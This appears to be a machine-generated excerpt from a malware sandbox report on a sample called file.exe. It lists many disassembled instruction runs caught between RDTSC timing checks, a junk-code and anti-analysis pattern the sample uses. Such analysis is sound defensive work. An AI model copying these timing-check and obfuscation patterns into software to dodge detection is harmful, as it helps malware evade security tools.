                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D282DF second address: D282FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1228D24AC3h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D282FD second address: D28312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jno 00007F122870CBC6h 0x0000000c jc 00007F122870CBC6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AA18 second address: D9AA1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AA1C second address: D9AA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F122870CBCEh 0x0000000c jng 00007F122870CBC6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9ABE1 second address: D9ABE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B02C second address: D9B038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F122870CBC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B038 second address: D9B061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jmp 00007F1228D24AC9h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B061 second address: D9B071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B1E3 second address: D9B1E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B1E7 second address: D9B1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B1F1 second address: D9B1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B1F7 second address: D9B1FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B6BD second address: D9B6D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F1228D24AB6h 0x0000000b popad 0x0000000c jl 00007F1228D24ABEh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B6D3 second address: D9B6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F122870CBD1h 0x0000000c pushad 0x0000000d jmp 00007F122870CBCAh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0152 second address: DA0177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1228D24AB6h 0x0000000a jmp 00007F1228D24AC1h 0x0000000f popad 0x00000010 pushad 0x00000011 jnl 00007F1228D24AB6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0177 second address: DA017D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA017D second address: DA0182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA030F second address: DA0317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0317 second address: DA0330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1228D24AC3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA04B8 second address: DA04BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0648 second address: DA064E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA064E second address: DA0670 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F122870CBD6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0A47 second address: DA0A8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F1228D24AB6h 0x00000009 je 00007F1228D24AB6h 0x0000000f jc 00007F1228D24AB6h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 jmp 00007F1228D24AC0h 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push ecx 0x00000020 jmp 00007F1228D24ABEh 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F1228D24ABAh 0x0000002c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0BB5 second address: DA0BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007F122870CBDBh 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24BF8 second address: D24C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnl 00007F1228D24AB8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24C0B second address: D24C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F122870CBD9h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24C2B second address: D24C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24C2F second address: D24C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBD0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4333 second address: DA4345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1228D24ABDh 0x00000009 pop ebx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4345 second address: DA434B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA434B second address: DA4355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1228D24AB6h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1FA4A second address: D1FA54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA94C4 second address: DA94CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA94CB second address: DA94E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F122870CBC6h 0x0000000d jmp 00007F122870CBCBh 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA94E3 second address: DA950A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1228D24AC9h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA950A second address: DA9511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9511 second address: DA9516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9516 second address: DA9533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBD0h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F122870CBC6h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA9533 second address: DA9537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DD95 second address: D6DD9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DD9B second address: D6DDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DDA0 second address: D6DDA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DDA5 second address: D6DDCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1228D24AB6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov ch, al 0x00000012 mov dword ptr [ebp+1245E7A2h], ebx 0x00000018 lea eax, dword ptr [ebp+12494B5Bh] 0x0000001e mov cx, ax 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DDCD second address: D6DDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DDD1 second address: D6DDD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DDD5 second address: D6DDDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DDDB second address: D6DDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1228D24AC2h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E399 second address: D6E3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push esi 0x0000000a jc 00007F122870CBC8h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007F122870CBD0h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F122870CBCAh 0x00000025 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E3CE second address: D6E405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jnl 00007F1228D24AC4h 0x00000014 pop eax 0x00000015 mov edx, 1505B3D5h 0x0000001a push D9A6AFCFh 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 jnl 00007F1228D24AB6h 0x00000028 pop esi 0x00000029 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E4E5 second address: D6E4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E4EB second address: D6E4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F1228D24ABCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E549 second address: D6E578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b jng 00007F122870CBC8h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 xchg eax, esi 0x00000015 sub edi, dword ptr [ebp+122D3995h] 0x0000001b nop 0x0000001c push edx 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E578 second address: D6E583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E583 second address: D6E589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E61C second address: D6E621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E621 second address: D6E626 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EB3F second address: D6EB44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EB44 second address: D6EB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EB4A second address: D6EB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F1228D24AB6h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EB5B second address: D6EBA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b movsx edi, bx 0x0000000e push 0000001Eh 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F122870CBC8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a or dword ptr [ebp+1246DDA5h], ebx 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jno 00007F122870CBC8h 0x00000039 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BEC7 second address: D6BED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EF9E second address: D6EFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EFA4 second address: D6F019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1228D24AC0h 0x0000000b jmp 00007F1228D24ABAh 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F1228D24AB8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov edi, 243CFC9Dh 0x00000031 lea eax, dword ptr [ebp+12494B9Fh] 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F1228D24AB8h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 mov dword ptr [ebp+1245E44Eh], ebx 0x00000057 push eax 0x00000058 push esi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F019 second address: D6F06B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d movsx edx, bx 0x00000010 lea eax, dword ptr [ebp+12494B5Bh] 0x00000016 clc 0x00000017 nop 0x00000018 pushad 0x00000019 push eax 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop eax 0x0000001d pushad 0x0000001e jmp 00007F122870CBD8h 0x00000023 push eax 0x00000024 pop eax 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6F06B second address: D6F07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1228D24AB6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA870A second address: DA870E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8C4D second address: DA8C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8C53 second address: DA8C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8C57 second address: DA8C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC74B second address: DAC74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC74F second address: DAC77A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F1228D24ABCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F1228D24AC6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF548 second address: DAF54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF134 second address: DAF13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB190B second address: DB1926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F122870CBD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB14EE second address: DB14FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB14FD second address: DB1501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4DF7 second address: DB4E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1228D24AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAC5E second address: DBAC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F122870CBCAh 0x0000000d jmp 00007F122870CBCEh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBAC83 second address: DBAC93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9556 second address: DB955B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB955B second address: DB9569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1228D24AB6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB981D second address: DB9856 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F122870CBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F122870CBCAh 0x00000013 push ecx 0x00000014 jmp 00007F122870CBCDh 0x00000019 jmp 00007F122870CBD3h 0x0000001e pop ecx 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9B0D second address: DB9B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB9C33 second address: DB9C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD9h 0x00000007 jmp 00007F122870CBD8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E9B7 second address: D6E9C5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1228D24AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6E9C5 second address: D6E9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA99E second address: DBA9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA9A6 second address: DBA9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBCFh 0x00000009 je 00007F122870CBC6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA9C4 second address: DBA9D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE85C second address: DBE866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
